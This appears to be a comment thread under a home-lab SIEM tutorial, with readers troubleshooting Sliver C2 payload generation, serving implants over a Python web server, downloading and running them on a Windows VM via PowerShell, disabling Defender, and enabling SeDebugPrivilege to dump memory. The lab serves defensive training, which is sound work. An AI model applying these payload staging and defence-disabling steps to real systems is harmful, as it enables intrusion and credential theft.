Hi Eric - Thank you so much for putting this together. I'm a bit stuck on the step executing the C2 payload on the Windows VM. I went back to make sure I was doing everything in order, but I'm getting an error message after executing the command "C:\Users\User\Downloads\NUCLEAR_CHAIR.exe" in the administrative PowerShell - it says "The term 'C:\Users\User\Downloads\NUCLEAR_CHAIR.exe' is not recognized as the name of a cmdlet, function, script file, or operable program." Everything leading up to the step has gone off without a hitch.
Could you please provide some guidance as to what's going on here? I appreciate your time, thanks!
It wasn't there! While redownloading I noticed a pop-up in the Windows VM notifying me of a security risk "NUCLEAR_CHAIR.exe"
I clicked the notification and selected "allow on device." I can try to continue from here, but I must've missed something during the steps disabling this on the Windows VM. Should I go back and reconfigure the Windows VM from the first section?
Just to follow up - I went back and re-disabled Microsoft Defender following the steps before and realized I missed one of the steps in the regedit section.
Back on track and everything is working as it should! Thank you!
Hello. I have the same issue-the payload file is on the Linux machine, but not the Windows VM in "Downloads,"-only the sensor is saved there. I re-ran through the steps, downloaded a second payload, same thing. I did not receive a pop-up in the Windows VM warning me of a security risk either time. So my payload files are not making it to the Windows VM.
Fun stuff! I know this is old news now, but I have had two issues so far.
First, as I am often known to do, I attempted to take the "easy" option of using "Sordum’s Defender Control" to disable Defender. The download was rar'ed and didn't contain an .exe file. Ru roh Raggy! I am thinking it could be malware, but what do I know.
Second, and this is what has stopped me for now, I am unable to get the sliver server to check in on the client once it starts. After executing the payload ( love saying that) nothing happens. No joy.
I will attempt to start from the beginning and try again later today. Thanks!
Hi Eric, when trying to run the C2 executable on Powershell I keep getting the error " Program 'FUZZY_MIDI.exe' failed to run: The specified executable is not a valid application for this OS platform. At line: 1 Char: 1:" any idea how to troubleshoot? Do you think it might be Defender or because I downloaded the latest version of Microsoft and perhaps they patched the payload hmmm... I'll try to figure it out in the meantime.
I had errors downloading the payload because of connection issues. What I did was revert back to the malware staged snapshot and redid the whole process this time successfully downloading the full payload correctly.
I am trying to set up or generate the C2 payload as you described(generate --http 192.168.42.128 --save /opt/sliver) for my ubuntu server via Putty(ssh) but i get the error "error:unknown command, try help"
I have figured it out , Eric. there was space in the command(just before generate part) hence why it did not work. a little patience is needed to troubleshoot i guess
Hey Eric, I am having a lot of trouble getting the SeDebugPrivilege to show up enabled. The first time I did it it showed up enabled. the next day it said disabled so I regenerated the implant and it was enabled. I then ran into errors dumping memory so I tried to use a new implant and since then I have not been able to get SeDebugPrivilege to be enabled. Have you ever ran into this?
Ye, that's the odd thing. I have in CMD launched the implant with admin. and I have also launched in GUI with admin. I even launched the same implant once and it worked and closed it and launched again and it didn't, and now none seem to want to work. I'm considering now its some bug on the Ubuntu side. Thanks for the reply!
Eric, I'm stuck right at the beginning of this step. When I enter "sliver-server", I get nothing in return. I've tried Googling it but haven't had any luck.
Okay, that got me into /opt/sliver and I ran the sliver-server command like it said and I'm still getting nothing. Are these steps a little out of order or am I just that much of a rookie? I see the cd /opt/sliver command is step 6, but I needed it before step two.
So I followed the VM instructions accurately but what I think may be the issue is whenever I try running the command to download Sliver, I get a lot of "Err" codes -Temporary failure resolving 'archive.ubuntu.com', and "E:" codes- Failed to fetch http://archive.ubuntu.com.
The following command to create a working directory does nothing.
I started back from the beginning and reinstalled the Linux VM. When I try to ping Google.com, I get this error: (ping: Google.com: temporary failure in name resolution). The last time, I also had this but ended up Googling how to add the Google IP addresses and make the ping work. I didn't realize none of the other domains would be reachable, which seems obvious now. Any idea why the Linux VM is having issues connecting to the internet? I followed everything to a T.
Hello Eric, I am stuck at the generate a C2 payload using sliver. I am not able to generate a payload even after typing the command: generate --http 10.0.2.15 --save /opt/sliver.
It says command not found sometimes and sometimes just shows random github directory lines. Do help
This is a symptom of using a different Ubuntu ISO than the one prescribed.. The desktop Ubuntu does not come with git preinstalled... Remedy with apt install git
I am using Virtual Box. Both the VMs are created in NAT mode. When I checked both IPs, they get assigned the same. I went with your blog for NAT. Should I use bridged mode instead?
The NAT only impacts the VMs traffic leaving the VM subnet, it should not affect the internal IPs assigned within the VM subnet... Sorry, I cannot give much guidance on VirtualBox as I haven't used it in a couple years.
No doubt missed something, but I've been working back through the steps and cannot find the cause. 22 is open and listening, I can ping the Linux VM, but the MS VM will not connect to the remote server. Continue to get the following:
In this case, port 22 doesn't play a role. The temporary web server should be listening on port 80. Be sure you've run the python3 -m http.server 80 step properly.
Got it! thanks I been experiencing my VMS are running super slow. So I did some testing and I'm using about 90% of the 16gb of ram that I have on my laptop lol. I might have to upgrade or maybe I can get my hands on a window pc or laptop.
My PC has 16GB and was having the same experience while running the Win VM. It looks like that VM comes preconfigured with 8GB Memory and 4 Processors. I bumped the processors down to 2 instead of 4 and had a much better experience. Hope this is helpful!
Glad to help. Also, thanks for putting this out there! It's my first time messing with a SIEM, much less standing one up in a virtualized environment. This has been really helpful to get some hands-on experience!
Hi Eric - Thank you so much for putting this together. I'm a bit stuck on the step executing the C2 payload on the Windows VM. I went back to make sure I was doing everything in order, but I'm getting an error message after executing the command "C:\Users\User\Downloads\NUCLEAR_CHAIR.exe" in the administrative PowerShell - it says "The term 'C:\Users\User\Downloads\NUCLEAR_CHAIR.exe' is not recognized as the name of a cmdlet, function, script file, or operable program." Everything leading up to the step has gone off without a hitch.
Could you please provide some guidance as to what's going on here? I appreciate your time, thanks!
Make sure the payload is actually there by cd'ing to that location and running ls
cd C:\Users\User\Downloads\
ls
Make sure you see it there, if not, re-download it.
It wasn't there! While redownloading I noticed a pop-up in the Windows VM notifying me of a security risk "NUCLEAR_CHAIR.exe"
I clicked the notification and selected "allow on device." I can try to continue from here, but I must've missed something during the steps disabling this on the Windows VM. Should I go back and reconfigure the Windows VM from the first section?
Thank you for your quick response and assistance!
Just to follow up - I went back and re-disabled Microsoft Defender following the steps before and realized I missed one of the steps in the regedit section.
Back on track and everything is working as it should! Thank you!
Hello. I have the same issue-the payload file is on the Linux machine, but not the Windows VM in "Downloads,"-only the sensor is saved there. I re-ran through the steps, downloaded a second payload, same thing. I did not receive a pop-up in the Windows VM warning me of a security risk either time. So my payload files are not making it to the Windows VM.
NM. Did not disable Defender on the Windows VM....
Hello Eric, I cannot SSH into my Linux VM from my host machine. Is that a problem that I should be concerned with?
There is no need to SSH you can proceed with the steps mentioned above
I am getting cd: /opt/sliver: not a directory for some reason.
You must've missed a step in part 1, specifically the part where we run mkdir -p /opt/sliver
I recommend re-accomplishing the attack system setup steps in part 1.
Thank you! I will try it again.
Not sure if I'm doing something wrong but I can't seem to get sliver to have any sessions appear.
I was able to get the payload on the windows VM and run the .exe but when I go to Sliver and run http it says "Job #2 Stopped and shows No sessions
Attempted rebooting the win VM but still not dice
Very nice. Every step worked perfectly. Got an error when running
sliver> http
but I just restarted the VM and it worked the second time.
I'm continuously getting the "IWR : Unable to connect to the remote server"
Is there anything suggested to get around this issue? Thanks
Fixed this by deleting the linux VM and restarting from scratch.
Love this outline, thanks so much for the resource and practice field!
Part 2, Step 7 gives me this error:
PS C:\Windows\system32> IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe
Invoke-WebRequest : Cannot bind parameter 'Uri'. Cannot convert value "http://[Linux_VM_IP]/[payload_name].exe" to
type "System.Uri". Error: "Invalid URI: The hostname could not be parsed."
At line:1 char:10
+ IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\Us ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Invoke-WebRequest], ParameterBindingException
+ FullyQualifiedErrorId : CannotConvertArgumentNoMessage,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
Fun stuff! I know this is old news now, but I have had two issues so far.
First, as I am often known to do, I attempted to take the "easy" option of using "Sordum’s Defender Control" to disable Defender. The download was rar'ed and didn't contain an .exe file. Ru roh Raggy! I am thinking it could be malware, but what do I know.
Second, and this is what has stopped me for now, I am unable to get the sliver server to check in on the client once it starts. After executing the payload ( love saying that) nothing happens. No joy.
I will attempt to start from the beginning and try again later today. Thanks!
Hi Eric, when trying to run the C2 executable on Powershell I keep getting the error " Program 'FUZZY_MIDI.exe' failed to run: The specified executable is not a valid application for this OS platform. At line: 1 Char: 1:" any idea how to troubleshoot? Do you think it might be Defender or because I downloaded the latest version of Microsoft and perhaps they patched the payload hmmm... I'll try to figure it out in the meantime.
I had errors downloading the payload because of connection issues. What I did was revert back to the malware staged snapshot and redid the whole process this time successfully downloading the full payload correctly.
Hi Eric, this has been a fun project so far, thanks!
I am not able to run the netstat cmd inside sliver and can't figure out why.
So far, everything other cmd works as intended, when I run netstat it just hangs forever with no data. I have to use ctrl+C to back out.
I am connected to the active session with the use [session ID] cmd
pwd shows C:/windows/system32
I can run netstat from the windows vm command line and get results, ping and dns are both working for internal and external connections
getprivs cmd shows the correct process attributes as enabled (exploit was ran as admin)
I'm blanking here, any help is appreciated.
Thanks!
Hi Eric, thanks for this walkthrough.
I am trying to set up or generate the C2 payload as you described(generate --http 192.168.42.128 --save /opt/sliver) for my ubuntu server via Putty(ssh) but i get the error "error:unknown command, try help"
i have tried sudo but nothing is successful
I have figured it out , Eric. there was space in the command(just before generate part) hence why it did not work. a little patience is needed to troubleshoot i guess
Hey Eric, I am having a lot of trouble getting the SeDebugPrivilege to show up enabled. The first time I did it it showed up enabled. the next day it said disabled so I regenerated the implant and it was enabled. I then ran into errors dumping memory so I tried to use a new implant and since then I have not been able to get SeDebugPrivilege to be enabled. Have you ever ran into this?
Make sure you are running the implant with admin privileges.
Ye, that's the odd thing. I have in CMD launched the implant with admin. and I have also launched in GUI with admin. I even launched the same implant once and it worked and closed it and launched again and it didn't, and now none seem to want to work. I'm considering now its some bug on the Ubuntu side. Thanks for the reply!
Eric, I'm stuck right at the beginning of this step. When I enter "sliver-server", I get nothing in return. I've tried Googling it but haven't had any luck.
Make sure you are working out of /opt/sliver by running this command first: cd /opt/sliver
Thank you for the quick response.
Okay, that got me into /opt/sliver and I ran the sliver-server command like it said and I'm still getting nothing. Are these steps a little out of order or am I just that much of a rookie? I see the cd /opt/sliver command is step 6, but I needed it before step two.
I am getting the sense that something got out of order here... I might try going back through the Linux VM setup instructions.
So I followed the VM instructions accurately but what I think may be the issue is whenever I try running the command to download Sliver, I get a lot of "Err" codes -Temporary failure resolving 'archive.ubuntu.com', and "E:" codes- Failed to fetch http://archive.ubuntu.com.
The following command to create a working directory does nothing.
Seems it may be an internet connectivity issue for the VM.
I pinged 8.8.8.8 and it worked fine. It just doesn't work with domain names, it seems.
I started back from the beginning and reinstalled the Linux VM. When I try to ping Google.com, I get this error: (ping: Google.com: temporary failure in name resolution). The last time, I also had this but ended up Googling how to add the Google IP addresses and make the ping work. I didn't realize none of the other domains would be reachable, which seems obvious now. Any idea why the Linux VM is having issues connecting to the internet? I followed everything to a T.
Hello Eric, I am stuck at the generate a C2 payload using sliver. I am not able to generate a payload even after typing the command: generate --http 10.0.2.15 --save /opt/sliver.
It says command not found sometimes and sometimes just shows random github directory lines. Do help
This is a symptom of using a different Ubuntu ISO than the one prescribed.. The desktop Ubuntu does not come with git preinstalled... Remedy with apt install git
IWR -Uri http://10.0.2.15/DARK_SHADE.exe -Outfile C:\Users\User\Downloads\DARK_SHADE.exe
IWR : Unable to connect to the remote server
At line:1 char:1
+ IWR -Uri http://10.0.2.15/DARK_SHADE.exe -Outfile C:\Users\User\Downl ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebReques
t], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCo
mmand
I get this error when I try to download the payload from the Ubuntu VM to the Windows VM. Should i add a firewall rule or something?
Both my Windows and Ubuntu VM have the IP address of 10.0.2.15. They are configured using NAT.
Both VMs cannot have the same IP. Make sure you have two different IPs on the VM subnet.
I am using Virtual Box. Both the VMs are created in NAT mode. When I checked both IPs, they get assigned the same. I went with your blog for NAT. Should I use bridged mode instead?
The NAT only impacts the VMs traffic leaving the VM subnet, it should not affect the internal IPs assigned within the VM subnet... Sorry, I cannot give much guidance on VirtualBox as I haven't used it in a couple years.
Okay Eric.
And one more thing, when I install VMware workstation pro, it asks for admin rights to run, is it a problem if I give it that?
If I give admin rights, does it impact my folder creation and document saving rights?
It worked! Thank you so much Eric!!
No doubt missed something, but I've been working back through the steps and cannot find the cause. 22 is open and listening, I can ping the Linux VM, but the MS VM will not connect to the remote server. Continue to get the following:
PS C:\Windows\system32> IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile C:\Users\User\Downloads\Unusual_Heron.exe
IWR : Unable to connect to the remote server
At line:1 char:1
+ IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
Any initial thoughts what I might be overlooking?
In this case, port 22 doesn't play a role. The temporary web server should be listening on port 80. Be sure you've run the python3 -m http.server 80 step properly.
Got it! thanks I been experiencing my VMS are running super slow. So I did some testing and I'm using about 90% of the 16gb of ram that I have on my laptop lol. I might have to upgrade or maybe I can get my hands on a window pc or laptop.
My PC has 16GB and was having the same experience while running the Win VM. It looks like that VM comes preconfigured with 8GB Memory and 4 Processors. I bumped the processors down to 2 instead of 4 and had a much better experience. Hope this is helpful!
I'll add a comment in the post, thanks for pointing that out.
Glad to help. Also, thanks for putting this out there! It's my first time messing with a SIEM, much less standing one up in a virtualized environment. This has been really helpful to get some hands-on experience!